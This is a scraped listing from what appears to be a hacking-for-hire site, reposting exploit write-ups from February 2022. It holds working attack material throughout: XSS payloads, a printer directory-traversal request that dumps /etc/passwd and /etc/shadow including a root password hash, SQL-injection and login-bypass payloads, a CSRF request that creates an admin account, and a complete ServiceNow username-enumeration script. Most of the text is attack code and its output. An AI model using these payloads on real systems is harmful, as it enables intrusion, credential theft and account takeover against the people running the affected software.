------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Wed, 09 Feb 2022 09:39:06 GMT Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/8.1.2 Access-Control-Allow-Origin: * Content-Length: 33 Connection: close Content-Type: text/html; charset=UTF-8 0xSaudi </pre> </body> </html>
  18. HireHackking

    WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/jetpack # Version: 9.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>
  19. HireHackking

    WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS) # Date: 2022-02-07 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/contact-forms-builder/ # Version: 1.6.1 # Tested on: Windows 11 # CVE: N/A 1. Description: This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/code_generator.php?form_id=<script>alert('xss')</script>
  20. HireHackking

    Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) # Author: Luis Martinez # Discovery Date: 2022-02-10 # Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html # Tested Version: ECOSYS M2035dn # Tested on: Linux # Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated) # Proof of Concept: # 1.- Create a directory traversal payload # 2.- Add nullbyte to the end of the payload(%00) # 3.- Sent your request Request 1: GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 1: HTTP/1.1 200 OK Content-Length: 844 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 15:55:57 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh adm:x:4:4:adm:/var/adm:/bin/sh lp:x:5:7:lp:/var/spool/lpd:/bin/sh sync:x:6:8:sync:/bin:/bin/sync shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown halt:x:8:10:halt:/sbin:/sbin/halt mail:x:9:11:mail:/var/mail:/bin/sh news:x:10:12:news:/var/spool/news:/bin/sh uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh operator:x:12:0:operator:/root:/bin/sh games:x:13:60:games:/usr/games:/bin/sh ftp:x:15:14:ftp:/var/ftp:/bin/sh man:x:16:20:man:/var/cache/man:/bin/sh www:x:17:18:www-data:/var/www:/bin/sh sshd:x:18:19:sshd:/var/run/sshd:/bin/sh proxy:x:19:21:proxy:/bin:/bin/sh telnetd:x:20:22:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh ais:x:101:101:ais:/var/run/ais:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Request 2: GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1 Cookie: rtl=0 Host: X.X.X.X Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Accept: */* Response 2: HTTP/1.1 200 OK Content-Length: 480 Upgrade: TLS/1.0 Accept-Encoding: identity Date: Thu, 10 Feb 2022 16:10:16 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT" Content-Type: image/jpeg root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873:::::: bin:*:15873:::::: daemon:*:15873:::::: sys:*:15873:::::: adm:*:15873:::::: lp:*:15873:::::: sync:*:15873:::::: shutdown:*:15873:::::: halt:*:15873:::::: mail:*:15873:::::: news:*:15873:::::: uucp:*:15873:::::: operator:*:15873:::::: games:*:15873:::::: ftp:*:15873:::::: man:*:15873:::::: www:*:15873:::::: sshd:*:15873:::::: proxy:*:15873:::::: telnetd:*:15873:::::: backup:*:15873:::::: ais:*:15873:::::: nobody:*:15873::::::
  21. HireHackking

    Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html # Version : 1.0 # Tested on: windows 10 xammp | Kali linux # Category: WebApp # Google Dork: N/A # Date: 09.02.2022 ######## Description ######## # # # Authenticate and get update user settings will be appear the # id paramater put your payload at there it'll be work # # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa Upgrade-Insecure-Requests: 1
  22. HireHackking

    Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) # Date: 2022-02-09 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://subrion.org # Software Link: https://subrion.org/download # Version: 4.2.1 # Tested on: Windows 10 # [ About - Subrion CMS ]: #Subrion is a PHP/MySQL based CMS & framework, #that allows you to build websites for any purpose, #Yes, from blog to corporate mega portal. # [ Description ]: # CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS, # With this vulnerability, authorized users can be added to the system. # [ Sample CSRF Request ]: POST /subrion/panel/members/add/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902 Content-Length: 2522 Origin: http://localhost Connection: close Referer: http://localhost/subrion/panel/members/add/ Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="__st" YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="username" Aryan -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="fullname" AryanChehreghani -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email" aryanchehreghani@yahoo.com -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="_password2" Test1234! -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="usergroup_id" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="website" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="phone" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="biography" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="facebook" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="twitter" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="gplus" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="linkedin" -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="email_language" en -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="sponsored" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured" 0 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="featured_end" 2022-03-09 12:03 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="status" active -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="save" 1 -----------------------------386122140640094420852486902 Content-Disposition: form-data; name="goto" list -----------------------------386122140640094420852486902--
  23. HireHackking

    Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection # Date: 11/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Vulnerable Code line 2 in file "mvogms/products/view_product.php $qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'"); # Sqlmap command: sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=products/view_product&id=3' AND 9973=9973-- ogag Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
  24. HireHackking

    Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass # Date: 11/02/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux # Vulnerable Code line 57 in file "/sqgs/Actions.php" @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count']; Steps To Reproduce: * - Go to the login page http://localhost/sqgs/login.php Payload: username: admin ' or '1'='1'#-- password: \ Proof of Concept : POST /sqgs/Actions.php?a=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/sqgs/login.php Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi
  25. HireHackking

    ServiceNow - Username Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ServiceNow - Username Enumeration # Google Dork: NA # Date: 12 February 2022 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2021-45901/ # Vendor Homepage: https://www.servicenow.com/ # Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html # Version: Orlando # Tested on: MAC OSX # CVE : CVE-2021-45901 #!/usr/local/bin/python3 # Author: Victor Hanna (SpiderLabs) # User enumeration script SNOW # Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token import requests import re import urllib.parse from colorama import init from colorama import Fore, Back, Style import sys import os import time from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): print ("[+]********************************************************************************[+]") print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |") print ("| Decription: SNOW Username Enumerator |") print ("| Usage : "+sys.argv[0]+" |") print ("| Prequisite: \'users.txt\' needs to contain list of users |") print ("[+]********************************************************************************[+]") def main(): os.system('clear') banner() proxies = { "http":"http://127.0.0.1:8080/", "https":"http://127.0.0.1:8080/" } url = "http://<redacted>/" try: # s = requests.Session() # s.verify = False r = requests.get(url, timeout=10, verify=False, proxies=proxies) JSESSIONID = r.cookies["JSESSIONID"] glide_user_route = r.cookies["glide_user_route"] startTime = (str(time.time_ns())) # print (startTime[:-6]) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except requests.exceptions.ProxyError: print ("[!] Can't communicate with proxy !") sys.exit(1) with open ("users.txt", "r") as f: usernames = f.readlines() print (f"[+] Brute forcing ....") for users in usernames: url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default" headers1 = { "Host": "<redacted>", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'" } try: # s = requests.Session() # s.verify = False r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies) obj1 = re.findall(r"pwd_csrf_token", r.text) obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text) tokenIndex = (r.text.index(obj1[0])) startTime2 = (str(time.time_ns())) # userTokenIndex = (r.text.index(obj2[0])) # userToken = (r.text[userTokenIndex+23 : userTokenIndex+95]) token = (r.text[tokenIndex+45:tokenIndex+73]) url = "http://<redacted>/xmlhttp.do" headers2 = { "Host": "<redacted>", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Content-Length": "786", "Origin": "http://<redacted>/", "Connection": "keep-alive", # "X-UserToken":""+userToken+"", "Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'" } data = { "sysparm_processor": "PwdAjaxVerifyIdentity", "sysparm_scope": "global", "sysparm_want_session_messages": "true", "sysparm_name":"verifyIdentity", "sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5", "sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b", "sysparm_user_id_0":""+users.strip()+"", "sysparm_identification_number":"1", "sysparam_pwd_csrf_token":""+token+"", "ni.nolog.x_referer":"ignore", "x_referer":"$pwd_reset.do?sysparm_url=ss_default" } payload_str = urllib.parse.urlencode(data, safe=":+") except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) try: # s = requests.Session() # s.verify = False time.sleep(2) r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies) if "500" in r.text: print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL) f = open("enumeratedUserList.txt", "a+") f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL) f.close() elif "200" in r.text: print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL) f = open("enumeratedUserList.txt", "a+") f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL) f.close() else: print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL) f = open("enumeratedUserList.txt", "a+") f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL) f.close() except KeyboardInterrupt: sys.exit() except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except Exception as e: print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL) if __name__ == "__main__": main ()